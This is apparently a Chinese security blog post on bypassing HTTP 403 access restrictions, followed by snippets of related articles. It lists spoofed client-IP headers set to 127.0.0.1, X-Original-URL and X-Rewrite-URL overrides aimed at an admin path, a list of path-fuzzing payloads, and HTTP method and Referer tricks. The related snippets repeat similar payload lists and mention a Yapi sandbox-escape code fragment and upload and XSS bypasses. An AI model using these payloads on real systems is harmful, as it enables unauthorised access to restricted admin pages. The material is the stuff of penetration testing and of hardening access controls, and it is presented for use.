403绕过小技巧

原创 已于 2024-12-27 08:32:28 修改 · 1.1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #大数据 #网络安全 #web #web安全

于 2024-12-27 08:30:59 首次发布

什么是403?

在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。

造成403的原因有哪些

 1. 你的IP被列入黑名单。 
 2. 以http方式访问需要ssl连接的网址。
 3. 你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。
 4. 你的网页脚本文件在当前目录下没有执行权限。
 5. 服务器繁忙,同一IP地址发送请求过多,遭到服务器智能屏蔽。
 6. 在不允许写/创建文件的目录中执行了创建/写文件操作。
 7. 网站域名解析到了空间,但空间未绑定此域名。
 8. 浏览器不支持SSL 128时访问SSL 128的连接。
 9. 连接的用户过多,可以过后再试。
 10.DNS解析错误,手动更改DNS服务器地址。

具体如何绕过403

1.绕过IP限制

可以通过下面的方式绕过:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost

2.url覆盖绕过

用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。

可以这样绕过的原因:有很多的web应用,只对uri地址内容进行权限检查,这就导致uri路径正常访问之后,我又覆盖了新的地址,导致403 ByPass

例如

GET / HTTP/1.1
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Host: www.abc.com
Host: 192.168.126.6

3.扩展名绕过(路径fuzz)

基于扩展名(路径),用于绕过403受限制的目录。
abc.com/admin => 403
abc.com/admin/ => 200
abc.com/admin// => 200
abc.com//admin// => 200
abc.com/admin/* => 200
abc.com/admin/*/ => 200
abc.com/admin/. => 200
abc.com/admin/./ => 200
abc.com/./admin/./ => 200
abc.com/admin/./. => 200
abc.com/admin/./. => 200
abc.com/admin? => 200
abc.com/admin?? => 200
abc.com/admin??? => 200
abc.com/admin…;/ => 200
abc.com/admin/…;/ => 200
abc.com/%2f/admin => 200
abc.com/%2e/admin => 200
abc.com/admin%20/ => 200
abc.com/admin%09/ => 200
abc.com/%20admin%20/ => 200

4.更换协议版本

如果使用 HTTP/1.1,请尝试使用 1.0,或者测试看它是否支持 2.0。

5.HTTP 请求方法fuzz

尝试使用不同的请求方法来访问:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK。

6.修改Referer

网站限制了访问来源,如果访问来源不符合,则也会返回403。

绕过方式:设置referer为访问网站的host。

7.修改user-agent

有的应用为了区分爬虫或者正常请求,会验证user-agent,看是否浏览器发出的请求。

8.常用自动化工具

1.https://github.com/iamj0ker/bypass-403

一些绕过403的姿势
weixin_45253622的博客
01-16 7662
端口利用 扫描主机端口,找其它开放web服务的端口;访问其端口。 修改HOST 把host值修改为子域名或者ip绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出中给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
渗透技巧之403绕过【总结】
薛定谔嘚喵博客
12-05 1万+
绕过 403 Forbidden Error 表示客户端能够与服务器通信,但服务器不允许客户端访问所请求的内容。
403绕过
m0_68636078的博客
07-16 6632
HTTP 403 Forbidden 是一种 HTTP 响应状态代码,表示服务器理解客户端的请求,但拒绝授权访问。权限不足:用户或客户端没有权限访问该资源。IP 黑名单:请求来自被阻止的 IP 地址。请求头部不匹配:例如,User-Agent 或 Referer 不符合服务器的要求。用途:最初用于邮件服务,表示邮件发送者的原始 IP 地址。示例用途:表示远程客户端的 IP 地址。示例用途:表示客户端的 IP 地址。示例用途:通过代理服务器或负载均衡器时,表示原始客户端的 IP 地址。示例用途。
403 Forbidden错误原因
沐雨金鳞
09-08 830
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
渗透测试 403绕过~~~满满的干货
qq_59919573的博客
01-31 1000
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP绕过这一限制。可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url中的路径,尝试绕过对更高级别的缓存和web服务器的限制。
20个403 bypass技巧
soc的博客
02-26 1138
Web渗透测试中,403 Forbidden状态码如同一位沉默的守卫,常常让安全人员陷入困境。这个状态码表明服务器已理解请求,但拒绝执行。本文将从底层协议原理出发,结合攻防对抗案例,系统梳理20种经过实战验证的绕过技巧,帮助安全从业者建立完整的403绕过知识体系。
Yapi 代码执行waf绕过小技巧
liguangyao213的博客
01-22 1739
  疫情在家办公,这时接到boss的电话说要做一个流量分析,老板发话干就干。对恶意告警分析差不多了,没事翻一翻流量,结果意外发现一个大宝贝!就这样开始了与Yapi的美丽邂逅。 高兴之余赶紧注册账户,写入恶意脚本。 const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = Funct
文件上传 后缀大小写绕过
qq_69100706的博客
08-05 591
在CTF(Capture The Flag)竞赛中,利用文件上传漏洞时,后缀大小写绕过是一种常见技巧,尤其当Web应用程序的文件上传过滤机制没有考虑到文件扩展名的大小写敏感性时。这种绕过技术利用了操作系统和Web服务器在处理文件名时可能存在的大小写敏感性差异。
网络安全upload-labs通关全教程:文件上传绕过技巧与安全防御措施详解
最新发布
07-11
文档分为基础、中级和高级三个阶段,详细介绍了多种文件上传绕过手法,如大小写绕过、空格截断、点号截断、双写后缀、%00截断等;还讲解了图片马制作方法(CMD/PHP/Python),以及高级技术如文件头检测绕过、二次...
87.网络安全渗透测试—[常规漏洞挖掘与利用篇3]—[xss测试-10种绕过技巧]
qwsn
01-26 5161
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss测试-10种绕过技巧 1、大小写绕过:`script标签一次匹配` 2、复写绕过(属性多余):`script大小写标签一次匹配` 3、转换标签绕过:`sciprt标签禁用` 4、转换方法绕过:alert方法禁用 5、手工闭合绕过:`既定的script标签` 6、手工闭合+单引号绕过:既定的scirpt标签+htmllentities默认参数 7、dom输出+hash属性+substring方法-弹窗: 8、ph
BurpSuite_403Bypasser:Burpsuite扩展程序绕过403受限制的目录
03-11
403章 一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。 有效负载:$ 1:HOSTNAME $ 2:PATH $1/$2 $1/./$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" $1 -H "X-Rewrite-URL: /$2" $1/$2 -H "Referer: /$2" $1/$2 -H "X-Originating-IP: 127.0.0.1" $1/$2 -H "X-Forwarded-For: 127.0.0.1" $1/$2 -H "X-Re
BypassSuper:绕过403或401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip.zip
09-18
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip 你需要做的就是从终端运行该工具,给出以下输入:尝试尝试的页面( http/https://website.com/page )被拒绝时得到的响应的内容长度你希望该工具通过 X-Forwarded-For 尝试的IP范围然后,该
403绕过(非常详细),零基础入门到精通,看这一篇就够了
2302_76672693的博客
11-21 1112
403绕过(非常详细),零基础入门到精通,看这一篇就够了
记一次403绕过技巧
mingyqf的博客
04-24 7951
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 端口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行访问返回403状态码。 实战 姿势一: 端口利用 拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web
渗透技巧之403绕过_指纹识别
热门推荐
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
【渗透实战】使用403bypasser绕过目标页面上的访问控制限制
kjuhfkicf154的博客
02-01 3572
403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。
渗透测试403绕过思路
qq_45087791的博客
03-26 650
在目录扫描的时候发现一些403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。
Ddr 绕等长小技巧
06-12
### DDR PCB绕等长小技巧及信号完整性设计指南 在DDR内存接口设计中,信号完整性和时序匹配是关键因素。为了确保DDR信号的稳定性和性能,以下是一些关于DDR绕等长的小技巧和信号完整性设计指南: 1. **关键信号的优先级** 在布线过程中,应优先考虑关键时序信号(如时钟CLK、命令/地址信号CA、控制信号CS#、RAS#、CAS#、WE#等)的布线[^2]。这些信号对时序要求较高,因此需要严格控制其长度和阻抗。 2. **等长布线(Length Matching)** DDR信号中的数据总线(DQ)、数据屏蔽(DM)、数据选通(DQS)等需要进行严格的等长布线。通常,DQS与DQ之间的长度差应在±1/4个UI(Unit Interval)以内,具体值取决于DDR的速度等级[^1]。可以通过PCB设计软件的自动等长功能或手动调整来实现这一目标。 3. **分组匹配(Group Matching)** 不同的DDR信号组之间也需要进行长度匹配。例如,DQ组内的信号长度应尽量一致,而不同DQ组之间的长度差异也需控制在一定范围内。此外,DQS信号应与对应的DQ信号保持适当的长度差,以满足建立时间和保持时间的要求[^1]。 4. **差分对布线(Differential Pair Routing)** 对于差分信号(如DQS、CLK),必须采用差分对布线方式,并确保差分对内的两条信号线长度完全一致。同时,差分对之间的间距应保持恒定,避免因电磁耦合导致的信号干扰[^2]。 5. **走线拓扑结构(Routing Topology)** 常见的DDR走线拓扑结构包括飞线拓扑(Fly-by Topology)和菊花链拓扑( Daisy Chain Topology)。飞线拓扑适用于DDR3及以上版本,能够减少终端电阻的影响并提高信号质量[^1]。 6. **电源和地平面设计** 确保DDR信号层下方有完整的电源或地平面,以降低信号回流路径的电感,从而改善信号完整性。输入电容应尽可能靠近DDR芯片放置,以减小电源环路面积[^3]。 7. **过孔(Via)使用限制** 尽量减少DDR信号上的过孔数量,因为过孔会引入额外的寄生电感和电容,影响信号质量。如果必须使用过孔,则应选择较小的过孔尺寸,并在过孔周围添加去耦电容[^2]。 8. **阻抗控制** DDR信号的特性阻抗通常要求为50Ω(单端)或100Ω(差分)。通过调整走线宽度、介质厚度和铜箔厚度,可以实现精确的阻抗控制。 9. **仿真验证** 在实际布线完成后,建议使用信号完整性仿真工具(如HyperLynx、SIwave等)对设计进行验证,确保所有信号均满足时序和电气特性要求。 ```python # 示例:Python脚本用于计算DDR信号的等长误差 def calculate_length_error(max_ui, ui_quarter): return max_ui * ui_quarter max_ui = 0.1 # 假设最大UI为0.1ns ui_quarter = 0.25 # 1/4 UI length_error = calculate_length_error(max_ui, ui_quarter) print(f"允许的长度误差为: {length_error} UI") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小丑001.

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值